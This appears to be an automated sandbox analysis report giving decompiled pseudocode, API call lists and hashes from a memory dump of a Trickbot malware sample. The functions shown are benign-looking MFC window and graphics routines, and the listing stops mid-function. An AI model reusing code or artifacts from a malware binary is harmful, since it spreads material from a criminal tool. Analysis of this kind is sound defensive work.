				InflateRect(_t255 - 0x44,  ~( *(_t255 + 0xc)),  ~( *(_t255 + 0x10)));
				IntersectRect(_t255 - 0x44, _t255 - 0x44,  *(_t255 + 8));
				E0042179E(_t255 - 0x14, CreateRectRgnIndirect(_t255 - 0x44));
				E0042179E(_t255 - 0x2c, CreateRectRgn(0, 0, 0, 0));
				asm("sbb eax, eax");
				asm("sbb ecx, ecx");
				CombineRgn( *(_t255 - 0x28),  ~(_t255 - 0x1c) &  *(_t255 - 0x18),  ~(_t255 - 0x14) &  *(_t255 - 0x10), 3);
				_t261 =  *((intOrPtr*)(_t255 + 0x20));
				if( *((intOrPtr*)(_t255 + 0x20)) == 0) {
					 *((intOrPtr*)(_t255 + 0x20)) = E0042C740(_t261);
				}
				if( *((intOrPtr*)(_t255 + 0x24)) == 0) {
					 *((intOrPtr*)(_t255 + 0x24)) =  *((intOrPtr*)(_t255 + 0x20));
				}
				E004046B6(_t255 - 0x24);
				 *(_t255 - 0x24) = 0x43aee4;
				 *((char*)(_t255 - 4)) = 3;
				E004046B6(_t255 - 0x34);
				 *((intOrPtr*)(_t255 - 0x34)) = 0x43aee4;
				_t250 =  *(_t255 + 0x14);
				 *((char*)(_t255 - 4)) = 4;
				if(_t250 != 0) {
					E0042179E(_t255 - 0x24, CreateRectRgn(0, 0, 0, 0));
					SetRectRgn( *(_t255 - 0x18),  *_t250, _t250->top, _t250->right, _t250->bottom);
					CopyRect(_t255 - 0x44, _t250);
					InflateRect(_t255 - 0x44,  ~( *(_t255 + 0x18)),  ~( *(_t255 + 0x1c)));
					IntersectRect(_t255 - 0x44, _t255 - 0x44, _t250);
					SetRectRgn( *(_t255 - 0x10),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c),  *(_t255 - 0x38));
					asm("sbb eax, eax");
					asm("sbb ecx, ecx");
					CombineRgn( *(_t255 - 0x20),  ~(_t255 - 0x1c) &  *(_t255 - 0x18),  ~(_t255 - 0x14) &  *(_t255 - 0x10), 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x24)) + 4))) {
						E0042179E(_t255 - 0x34, CreateRectRgn(0, 0, 0, 0));
						asm("sbb eax, eax");
						asm("sbb ecx, ecx");
						CombineRgn( *(_t255 - 0x30),  ~(_t255 - 0x24) &  *(_t255 - 0x20),  ~(_t255 - 0x2c) &  *(_t255 - 0x28), 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x24)) + 4)) && _t250 != 0) {
					E00421288(_t246, _t255 - 0x24);
					 *((intOrPtr*)( *_t246 + 0x50))(_t255 - 0x44);
					_t165 = E00420EC2(_t246,  *((intOrPtr*)(_t255 + 0x24)));
					PatBlt( *(_t246 + 4),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c) -  *(_t255 - 0x44),  *(_t255 - 0x38) -  *(_t255 - 0x40), 0x5a0049);
					E00420EC2(_t246, _t165);
				}
				_t146 = _t255 - 0x34;
				if( *(_t255 - 0x30) == 0) {
					_t146 = _t255 - 0x2c;
				}
				E00421288(_t246, _t146);
				 *((intOrPtr*)( *_t246 + 0x50))(_t255 - 0x44);
				_t150 = E00420EC2(_t246,  *((intOrPtr*)(_t255 + 0x20)));
				_t251 = _t150;
				PatBlt( *(_t246 + 4),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c) -  *(_t255 - 0x44),  *(_t255 - 0x38) -  *(_t255 - 0x40), 0x5a0049);
				if(_t150 != 0) {
					E00420EC2(_t246, _t251);
				}
				E00421288(_t246, 0);
				 *((intOrPtr*)(_t255 - 0x34)) = 0x43aed4;
				 *((char*)(_t255 - 4)) = 5;
				E004217F5(_t255 - 0x34);
				 *(_t255 - 0x24) = 0x43aed4;
				 *((char*)(_t255 - 4)) = 6;
				E004217F5(_t255 - 0x24);
				 *(_t255 - 0x14) = 0x43aed4;
				 *((char*)(_t255 - 4)) = 7;
				E004217F5(_t255 - 0x14);
				 *(_t255 - 0x1c) = 0x43aed4;
				 *((char*)(_t255 - 4)) = 8;
				E004217F5(_t255 - 0x1c);
				 *(_t255 - 0x2c) = 0x43aed4;
				 *((intOrPtr*)(_t255 - 4)) = 9;
				_t159 = E004217F5(_t255 - 0x2c);
				 *[fs:0x0] =  *((intOrPtr*)(_t255 - 0xc));
				return _t159;
			}

0x0042c7b8
0x0042c7c3
0x0042c7c8
0x0042c7d2
0x0042c7da
0x0042c7dd
0x0042c7e2
0x0042c7e8
0x0042c7ec
0x0042c7f1
0x0042c7f7
0x0042c805
0x0042c811
0x0042c827
0x0042c838
0x0042c84c
0x0042c85f
0x0042c86c
0x0042c875
0x0042c87f
0x0042c885
0x0042c888
0x0042c88f
0x0042c88f
0x0042c895
0x0042c89a
0x0042c89a
0x0042c8a0
0x0042c8a5
0x0042c8ab
0x0042c8af
0x0042c8b4
0x0042c8b7
0x0042c8ba
0x0042c8c0
0x0042c8d4
0x0042c8e7
0x0042c8f2
0x0042c908
0x0042c917
0x0042c92c
0x0042c93a
0x0042c943
0x0042c94d
0x0042c95f
0x0042c96f
0x0042c97c
0x0042c985
0x0042c98f
0x0042c98f
0x0042c95f
0x0042c9a1
0x0042c9ad
0x0042c9ba
0x0042c9c2
0x0042c9e5
0x0042c9ee
0x0042c9ee
0x0042c9f6
0x0042c9f9
0x0042c9fb
0x0042c9fb
0x0042ca01
0x0042ca0e
0x0042ca16
0x0042ca1e
0x0042ca39
0x0042ca41
0x0042ca46
0x0042ca46
0x0042ca4e
0x0042ca58
0x0042ca5e
0x0042ca62
0x0042ca67
0x0042ca6d
0x0042ca71
0x0042ca76
0x0042ca7c
0x0042ca80
0x0042ca85
0x0042ca8b
0x0042ca8f
0x0042ca94
0x0042ca9a
0x0042caa1
0x0042caac
0x0042cab4

APIs

__EH_prolog.LIBCMT ref: 0042C7B8
CreateRectRgnIndirect.GDI32(?), ref: 0042C7FB
CopyRect.USER32(?,?), ref: 0042C811
InflateRect.USER32(?,?,?), ref: 0042C827
IntersectRect.USER32(?,?,?), ref: 0042C838
CreateRectRgnIndirect.GDI32(?), ref: 0042C842
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0042C855
CombineRgn.GDI32(?,?,?,00000003), ref: 0042C87F
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0042C8CA
SetRectRgn.GDI32(?,?,?,?,?), ref: 0042C8E7
CopyRect.USER32(?,?), ref: 0042C8F2
InflateRect.USER32(?,?,?), ref: 0042C908
IntersectRect.USER32(?,?,?), ref: 0042C917
SetRectRgn.GDI32(?,?,?,?,?), ref: 0042C92C
CombineRgn.GDI32(?,?,?,00000003), ref: 0042C94D
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0042C965
CombineRgn.GDI32(?,?,?,00000003), ref: 0042C98F

Part of subcall function 0042C740: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,0042A724), ref: 0042C77F
Part of subcall function 0042C740: CreatePatternBrush.GDI32(00000000), ref: 0042C78C
Part of subcall function 0042C740: DeleteObject.GDI32(00000000), ref: 0042C798

Part of subcall function 00421288: SelectClipRgn.GDI32(?,00000000), ref: 004212AA
Part of subcall function 00421288: SelectClipRgn.GDI32(?,?), ref: 004212C0

Part of subcall function 00420EC2: SelectObject.GDI32(?,00000000), ref: 00420EE4
Part of subcall function 00420EC2: SelectObject.GDI32(?,?), ref: 00420EFA

PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0042C9E5
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0042CA39

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$Create$Select$CombineObject$ClipCopyIndirectInflateIntersect$BitmapBrushDeleteH_prologPattern
String ID:
API String ID: 4023391435-0
Opcode ID: 452eb11c3f780d48d282d0b538d2b264e2dd20c0d380a7e524e99793db555866
Instruction ID: 2604795a96ba41c5c42bdad28226182bbeba2e24f2e28d12491b3412699efff8
Opcode Fuzzy Hash: 452eb11c3f780d48d282d0b538d2b264e2dd20c0d380a7e524e99793db555866
Instruction Fuzzy Hash: 12A107B2A00119EFCF05DFA4D989DEEBBB9FF58304F10411AF506A2251DB796E05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0042C376, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0042C376(void* __ecx, void* __edx, void* __edi) {
				int* _v8;
				struct HWND__* _v12;
				struct HWND__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				struct HWND__* _t65;
				struct HWND__* _t79;
				struct HWND__* _t82;
				intOrPtr _t88;
				struct HWND__* _t95;
				struct HWND__* _t110;
				void* _t126;
				void* _t127;
				int* _t130;
				void* _t131;

				_t127 = __edi;
				_t126 = __edx;
				_t131 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x80)) == 0) {
					_t110 = GetDlgItem( *(__ecx + 0x1c), 0x3020);
					_t133 = _t110;
					if(_t110 != 0) {
						E004184E5(_t110, 0x200, 0, 0);
					}
				}
				_push(_t127);
				if(( *(E0042BD0C(_t131, _t133) + 4) & 0x00002020) != 0) {
					L10:
					_t65 = E004187B4(_t131);
					_t141 =  *((intOrPtr*)(_t131 + 0x84));
					_v12 = _t65;
					if( *((intOrPtr*)(_t131 + 0x84)) == 0 || ( *(E0042BD0C(_t131, _t141) + 4) & 0x00002020) != 0) {
						L16:
						if((E0041B66F(_t131) & 0x40000000) == 0) {
							E0041AC18(_t131, _t126, 0);
						}
						return _v12;
					} else {
						GetWindowRect( *(_t131 + 0x1c),  &_v48);
						GetWindowRect(GetDlgItem( *(_t131 + 0x1c), 1),  &_v32);
						E0041B784(_t131, 0, 0, 0, _v48.right - _v48.left, _v32.top - _v48.top, 0x16);
						_t130 = 0x44739c;
						do {
							_t79 = GetDlgItem( *(_t131 + 0x1c),  *_t130);
							_v16 = _t79;
							if(_t79 != 0) {
								ShowWindow(_t79, 0);
								EnableWindow(_v16, 0);
							}
							_t130 =  &(_t130[1]);
						} while (_t130 < 0x4473ac);
						goto L16;
					}
				} else {
					_t82 = GetDlgItem( *(_t131 + 0x1c), 0x3020);
					_v12 = _t82;
					GetWindowRect(_t82,  &_v32);
					E0042147E(_t131,  &_v32);
					_v48.left = 0;
					_v48.top = 0;
					_v48.right = 0;
					_v48.bottom = 0x20;
					MapDialogRect( *(_t131 + 0x1c),  &_v48);
					_t88 = _v32.bottom;
					if(_v48.bottom >= _t88) {
						goto L10;
					}
					_v16 = _t88 - _v32.top - _v48.bottom;
					SetWindowPos(_v12, 0, 0, 0, _v32.right - _v32.left, _v48.bottom, 0x16);
					_v8 = 0x44739c;
					do {
						_t95 = GetDlgItem( *(_t131 + 0x1c),  *_v8);
						_v12 = _t95;
						if(_t95 != 0) {
							GetWindowRect(_t95,  &_v32);
							E0042147E(_t131,  &_v32);
							SetWindowPos(_v12, 0, _v32.left, _v32.top - _v16, 0, 0, 0x15);
						}
						_v8 =  &(_v8[1]);
					} while (_v8 < 0x4473ac);
					GetWindowRect( *(_t131 + 0x1c),  &_v32);
					E0041B784(_t131, 0, 0, 0, _v32.right - _v32, _v32.bottom - _v32.top - _v16, 0x16);
					goto L10;
				}
			}

0x0042c376
0x0042c376
0x0042c37e
0x0042c388
0x0042c392
0x0042c398
0x0042c39a
0x0042c3a4
0x0042c3a4
0x0042c39a
0x0042c3a9
0x0042c3bd
0x0042c4a9
0x0042c4ab
0x0042c4b0
0x0042c4b6
0x0042c4b9
0x0042c533
0x0042c540
0x0042c545
0x0042c545
0x0042c550
0x0042c4ca
0x0042c4d1
0x0042c4e3
0x0042c4fa
0x0042c4ff
0x0042c504
0x0042c509
0x0042c511
0x0042c514
0x0042c518
0x0042c522
0x0042c522
0x0042c528
0x0042c52b
0x00000000
0x0042c504
0x0042c3c3
0x0042c3cb
0x0042c3d4
0x0042c3d9
0x0042c3e1
0x0042c3e9
0x0042c3ed
0x0042c3f3
0x0042c3f6
0x0042c3fd
0x0042c403
0x0042c409
0x00000000
0x00000000
0x0042c41a
0x0042c42a
0x0042c430
0x0042c437
0x0042c43f
0x0042c447
0x0042c44a
0x0042c451
0x0042c459
0x0042c470
0x0042c470
0x0042c476
0x0042c47a
0x0042c48a
0x0042c4a4
0x00000000
0x0042c4a4

APIs

GetDlgItem.USER32(?,00003020), ref: 0042C392
GetDlgItem.USER32(?,00003020), ref: 0042C3CB
GetWindowRect.USER32(00000000,?), ref: 0042C3D9
MapDialogRect.USER32(?,?), ref: 0042C3FD
SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000020,00000016), ref: 0042C42A
GetDlgItem.USER32(?,0044739C), ref: 0042C43F
GetWindowRect.USER32(00000000,?), ref: 0042C451
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000015), ref: 0042C470
GetWindowRect.USER32(?,?), ref: 0042C48A
GetWindowRect.USER32(?,?), ref: 0042C4D1
GetDlgItem.USER32(?,00000001), ref: 0042C4D8
GetWindowRect.USER32(00000000,?), ref: 0042C4E3
GetDlgItem.USER32(?,0044739C), ref: 0042C509
ShowWindow.USER32(00000000,00000000), ref: 0042C518
EnableWindow.USER32(?,00000000), ref: 0042C522

Strings

, xrefs: 0042C3F6

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$Rect$Item$DialogEnableShow
String ID:
API String ID: 763981185-3916222277
Opcode ID: 97fbdb95e80f6cf2d6e4af29c1fdc7ed3e353b049a29fc6272a3ae891282bee3
Instruction ID: b3bb8dee7536ab1172bfadd894a568a0c34963d4827b48d31431274bb495a4d3
Opcode Fuzzy Hash: 97fbdb95e80f6cf2d6e4af29c1fdc7ed3e353b049a29fc6272a3ae891282bee3
Instruction Fuzzy Hash: BD512BB1A00219AFDF11DFA5DC89DAFBBB9EF08304F50852AF501A2250DB789D45DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC18, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 174
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0041AC18(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E0041B66F(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E00404366(E004042FB(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E004041A9();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E00404366(E004042FB(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E0041B784(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

0x0041ac18
0x0041ac20
0x0041ac23
0x0041ac2b
0x0041ac2e
0x0041ac33
0x0041ac3e
0x0041ac50
0x0041ac40
0x0041ac43
0x0041ac43
0x0041ac56
0x0041ac5a
0x0041ac66
0x0041ac6e
0x0041ac70
0x0041ac70
0x0041ac6e
0x0041ac35
0x0041ac35
0x0041ac35
0x0041ac7f
0x0041ac85
0x0041ad25
0x0041ad2c
0x0041ad33
0x0041ad3d
0x0041ac8b
0x0041ac8d
0x0041ac92
0x0041ac9d
0x0041aca6
0x0041aca6
0x0041ac9d
0x0041acaa
0x0041acb1
0x0041acf2
0x0041ad01
0x0041ad0e
0x0041acb3
0x0041acb3
0x0041acba
0x0041acbc
0x0041acbc
0x0041accc
0x0041acdf
0x0041ace9
0x0041ace9
0x0041acb1
0x0041ad4e
0x0041ad54
0x0041ad57
0x0041ad5e
0x0041ad61
0x0041ad68
0x0041ad6f
0x0041ad76
0x0041ad7d
0x0041ad82
0x0041ad89
0x0041ad90
0x0041ad98
0x0041ad98
0x0041ad84
0x0041ad84
0x0041ad84
0x0041ad9d
0x0041ada9
0x0041adb1
0x0041adb1
0x0041ad9f
0x0041ad9f
0x0041ad9f
0x0041adca

APIs

Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B

GetParent.USER32(?), ref: 0041AC43
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 0041AC66
GetWindowRect.USER32(?,?), ref: 0041AC7F
GetWindowLongA.USER32(00000000,000000F0), ref: 0041AC92
CopyRect.USER32(?,?), ref: 0041ACDF
CopyRect.USER32(?,?), ref: 0041ACE9
GetWindowRect.USER32(00000000,?), ref: 0041ACF2
CopyRect.USER32(?,?), ref: 0041AD0E

Strings

(, xrefs: 0041ACAA
@, xrefs: 0041AC81

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: ($@
API String ID: 808654186-1311469180
Opcode ID: 3fe0501b51771b3c5ef70d979313766e79cd01e565e865381a51682ce7987bf9
Instruction ID: 1cae885df4c53b87d04d08a3a6792948b9a157dfe65044d88c0b125d6a81ff77
Opcode Fuzzy Hash: 3fe0501b51771b3c5ef70d979313766e79cd01e565e865381a51682ce7987bf9
Instruction Fuzzy Hash: 14518472A00219AFCF11DBA8DC85EEEBBB9AF44310F144126F901F3290DB78ED558B59

Uniqueness

Uniqueness Score: -1.00%

Function 00436316, Relevance: 25.6, APIs: 17, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00436316(intOrPtr* __ecx) {
				void* _t19;
				void* _t46;
				void* _t64;

				if( *(__ecx + 4) != 0) {
					_t64 = SelectObject( *(__ecx + 8), GetStockObject(7));
					SelectObject( *(__ecx + 8), _t64);
					SelectObject( *(__ecx + 4), _t64);
					_t46 = SelectObject( *(__ecx + 8), GetStockObject(4));
					SelectObject( *(__ecx + 8), _t46);
					SelectObject( *(__ecx + 4), _t46);
					E00420F93(__ecx, GetROP2( *(__ecx + 8)));
					E00420F37(__ecx, GetBkMode( *(__ecx + 8)));
					E004213CD(__ecx, GetTextAlign( *(__ecx + 8)));
					E00420F65(__ecx, GetPolyFillMode( *(__ecx + 8)));
					E00420FC1(__ecx, GetStretchBltMode( *(__ecx + 8)));
					_push(GetNearestColor( *(__ecx + 8), GetTextColor( *(__ecx + 8))));
					 *((intOrPtr*)( *__ecx + 0x30))();
					_push(GetNearestColor( *(__ecx + 8), GetBkColor( *(__ecx + 8))));
					return  *((intOrPtr*)( *__ecx + 0x2c))();
				}
				return _t19;
			}

0x0043631d
0x0043633c
0x00436342
0x00436348
0x00436354
0x0043635a
0x00436360
0x0043636e
0x0043637f
0x00436390
0x004363a1
0x004363b2
0x004363ce
0x004363d1
0x004363e5
0x00000000
0x004363ed
0x004363ef

APIs

GetStockObject.GDI32(00000007), ref: 0043632E
SelectObject.GDI32(00000000,00000000), ref: 0043633A
SelectObject.GDI32(00000000,00000000), ref: 00436342
SelectObject.GDI32(00000000,00000000), ref: 00436348
GetStockObject.GDI32(00000004), ref: 0043634C
SelectObject.GDI32(00000000,00000000), ref: 00436352
SelectObject.GDI32(00000000,00000000), ref: 0043635A
SelectObject.GDI32(00000000,00000000), ref: 00436360
GetROP2.GDI32(00000000), ref: 00436365

Part of subcall function 00420F93: SetROP2.GDI32(?,00000000), ref: 00420FAC
Part of subcall function 00420F93: SetROP2.GDI32(?,00000000), ref: 00420FBA

GetBkMode.GDI32(00000000), ref: 00436376

Part of subcall function 00420F37: SetBkMode.GDI32(?,?), ref: 00420F50
Part of subcall function 00420F37: SetBkMode.GDI32(?,?), ref: 00420F5E

GetTextAlign.GDI32(00000000), ref: 00436387

Part of subcall function 004213CD: SetTextAlign.GDI32(?,00000000), ref: 004213E8
Part of subcall function 004213CD: SetTextAlign.GDI32(?,00000000), ref: 004213F6

GetPolyFillMode.GDI32(00000000), ref: 00436398

Part of subcall function 00420F65: SetPolyFillMode.GDI32(?,?), ref: 00420F7E
Part of subcall function 00420F65: SetPolyFillMode.GDI32(?,?), ref: 00420F8C

GetStretchBltMode.GDI32(00000000), ref: 004363A9

Part of subcall function 00420FC1: SetStretchBltMode.GDI32(?,?), ref: 00420FDA
Part of subcall function 00420FC1: SetStretchBltMode.GDI32(?,?), ref: 00420FE8

GetTextColor.GDI32(00000000), ref: 004363BA
GetNearestColor.GDI32(00000000,00000000), ref: 004363CA
GetBkColor.GDI32(00000000), ref: 004363D7
GetNearestColor.GDI32(00000000,00000000), ref: 004363E1

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Mode$Object$Select$ColorText$AlignFillPolyStretch$NearestStock
String ID:
API String ID: 1751264856-0
Opcode ID: 45db5bcce57a4e8f27ed5c0a934facf34518a3714622b05897452d4914f875ef
Instruction ID: e58643aa5b055f3f55d70e15a400ecf6f825e4c44caec3be679e9c0ac1170a3c
Opcode Fuzzy Hash: 45db5bcce57a4e8f27ed5c0a934facf34518a3714622b05897452d4914f875ef
Instruction Fuzzy Hash: F6216071200516BFDB217B66DC48D2BBBEEFF883007018429F15A91531CBA2AC52DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004347AC, Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 332
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004347AC(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* _t171;
				struct HDC__* _t188;
				intOrPtr* _t192;
				intOrPtr _t203;
				struct HBRUSH__* _t239;
				intOrPtr* _t244;
				signed int* _t276;
				intOrPtr* _t281;
				intOrPtr _t301;
				intOrPtr _t317;
				intOrPtr* _t339;
				intOrPtr _t342;
				intOrPtr _t343;
				int* _t351;
				intOrPtr* _t352;
				int _t353;
				void* _t355;

				_t171 = E00405340(E00437C00, _t355);
				_t281 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x70)) == 0 ||  *((intOrPtr*)(__ecx + 0x7c)) == 0) {
					L22:
					 *[fs:0x0] =  *((intOrPtr*)(_t355 - 0xc));
					return _t171;
				} else {
					_t339 =  *((intOrPtr*)(_t355 + 8));
					GetViewportOrgEx( *(_t339 + 8), _t355 - 0x24);
					 *((intOrPtr*)(_t355 - 0x38)) = 0;
					 *(_t355 - 0x2c) =  *(_t355 - 0x24);
					 *(_t355 - 0x28) =  *(_t355 - 0x20);
					 *((intOrPtr*)(_t355 - 0x3c)) = 0x43b57c;
					 *(_t355 - 4) = 0;
					E0042179E(_t355 - 0x3c, CreatePen(0, 2, GetSysColor(6)));
					 *(_t355 - 0x30) =  *(_t355 - 0x30) & 0x00000000;
					 *((intOrPtr*)(_t355 - 0x34)) = 0x43b57c;
					 *(_t355 - 4) = 1;
					E0042179E(_t355 - 0x34, CreatePen(0, 3, GetSysColor(0x10)));
					 *((intOrPtr*)(_t355 - 0x10)) = 0;
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x114)) + 0x10)) = 1;
					if( *((intOrPtr*)(_t281 + 0xf8)) <= 0) {
						L21:
						E004217F5(_t355 - 0x3c);
						E004217F5(_t355 - 0x34);
						 *((intOrPtr*)(_t355 - 0x34)) = 0x43aed4;
						 *(_t355 - 4) = 2;
						E004217F5(_t355 - 0x34);
						 *((intOrPtr*)(_t355 - 0x3c)) = 0x43aed4;
						 *(_t355 - 4) = 3;
						_t171 = E004217F5(_t355 - 0x3c);
						goto L22;
					} else {
						 *((intOrPtr*)(_t355 - 0x14)) = 0;
						while(1) {
							 *((intOrPtr*)(_t355 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x1c))();
							if(_t339 != 0) {
								_t188 =  *(_t339 + 4);
							} else {
								_t188 = 0;
							}
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x10))(_t188);
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x114)) + 0x14)) =  *((intOrPtr*)(_t281 + 0xf4)) +  *((intOrPtr*)(_t355 - 0x10));
							_t192 =  *((intOrPtr*)(_t281 + 0x114));
							if( *((intOrPtr*)(_t281 + 0xf4)) +  *((intOrPtr*)(_t355 - 0x10)) <= ( *( *((intOrPtr*)( *_t192 + 0x5c)) + 0x1e) & 0x0000ffff)) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x70)))) + 0xdc))( *((intOrPtr*)(_t281 + 0x74)), _t192);
							}
							 *(_t355 - 0x1c) = GetDeviceCaps( *( *((intOrPtr*)(_t281 + 0x74)) + 8), 0xa);
							SetRect( *((intOrPtr*)(_t281 + 0x114)) + 0x24, 0, 0, GetDeviceCaps( *( *((intOrPtr*)(_t281 + 0x74)) + 8), 8),  *(_t355 - 0x1c));
							DPtoLP( *( *((intOrPtr*)(_t281 + 0x74)) + 8),  *((intOrPtr*)(_t281 + 0x114)) + 0x24, 2);
							 *((intOrPtr*)( *_t339 + 0x1c))();
							_t203 =  *((intOrPtr*)(_t281 + 0x90));
							_t301 =  *((intOrPtr*)(_t355 - 0x14));
							_t351 = _t301 + _t203;
							 *(_t355 - 0x1c) = _t351;
							if( *((intOrPtr*)(_t301 + _t203 + 0x18)) == 0) {
								 *((intOrPtr*)( *_t281 + 0x10c))( *((intOrPtr*)(_t355 - 0x10)));
								if( *((intOrPtr*)(_t281 + 0xec)) != 0) {
									_t276 = E0041FEE4(_t281, _t355 - 0x44);
									 *(_t355 - 0x2c) =  ~( *_t276);
									 *(_t355 - 0x28) =  ~(_t276[1]);
								}
							}
							 *((intOrPtr*)( *_t339 + 0x34))(1);
